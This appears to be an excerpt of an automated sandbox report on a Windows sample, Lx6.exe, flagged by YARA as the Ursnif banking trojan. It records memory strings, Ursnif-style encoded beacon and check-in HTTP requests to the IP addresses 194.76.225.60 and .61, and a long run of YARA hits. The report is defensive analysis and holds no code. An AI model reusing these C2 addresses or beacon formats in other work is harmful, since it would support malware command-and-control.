Source: powershell.exe, 00000004.00000002.558784999.0000021F35581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.861404017.00000191D4411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.l
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA12OBYj.img?h=368&
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000E.00000000.541728807.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.481741357.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.517838181.0000000008260000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22M
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Lx6.exe, 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.388832296.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1665493296&rver=7.0.6730.0&am
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/logout.srf?ct=1665493297&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1665493296&rver=7.0.6730.0&w
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://outlook.com/
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hoeren-heute.ch/d/horizon_reveal/?act=ACT0000044974ACT&utm_source=mcrs&utm_mediu
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hoeren-heute.ch/d/nulltarif_offer/?act=ACT0000045540ACT&utm_source=mcrs&utm_medi
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/finanzen/nachrichten/angebotsmieten-in-allen-kantonen-gestiegen/ar-AA12OUn
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/ja-er-will-r%c3%b6sti-gibt-seine-kandidatur-bekannt/ar
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/bewaffnete-m%c3%a4nner-%c3%bcberfallen-luzerner-bar/ar-AA12NkUo
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/bundesratswahl-alle-augen-richten-sich-nach-bern/ar-AA12LMZu?oc
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/r%c3%a4uber-muss-nach-%c3%bcberfallserie-mehr-als-drei-jahre-in
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/wie-deine-abgeschnittenen-haare-seen-s%c3%a4ubern-k%c3%b6nnen/a
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/shopping
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/sport/other/fcz-bleibt-letzter-lugano-schl%c3%a4gt-basel-servette-und-luze
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/sport/other/z%c3%bcrich-und-winterthur-zeigten-wo-sie-stehen/ar-AA12LPId?o
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/lifehacks/dose-offnen/?utm_campaign=DECH-Dose&utm_source=MSN&u
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/lifehacks/dosenoeffner-falsch-benutzt/?utm_campaign=DECH-canopen&u
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/saubermachen/reinige-dusche-spulmaschinentab/?utm_campaign=DECH-spulit
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/sonstiges/diese-96-jahre-alte-dame-will-ihr-haus-verkaufen-wenn-du-dir
Source: unknown DNS traffic detected: queries for: tel12.msn.com
Source: global traffic HTTP traffic detected: GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
Source: global traffic HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Content-Length: 54Connection: Keep-AliveCache-Control: no-cacheData Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 | "0xaaa494e7_6314cd46c4ff5" | 0
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="http://www.bing.com" /><link rel="preconnect" href="//browser.events.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="http://www.bing.com" /><link rel="dns-prefetch" href="//browser.events.data.msn.com" /><link rel="canonical" href="http://www.msn.com/de-ch/" /> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 79em)",size3column:"(min-width: 58.875em) and (max-width: 78.99em)",size2column:"(min-width: 43.75em) and (max-width: 58.865em)",size2rowsize4column:"(min-width: 79em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 58.875em) and (max-width: 78.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 58.865em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 79em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 58.875em) and (max-width: 78.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 58.865em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="http://www.msn.com/de-ch"/><meta property="og:url" content="http://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick{di

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
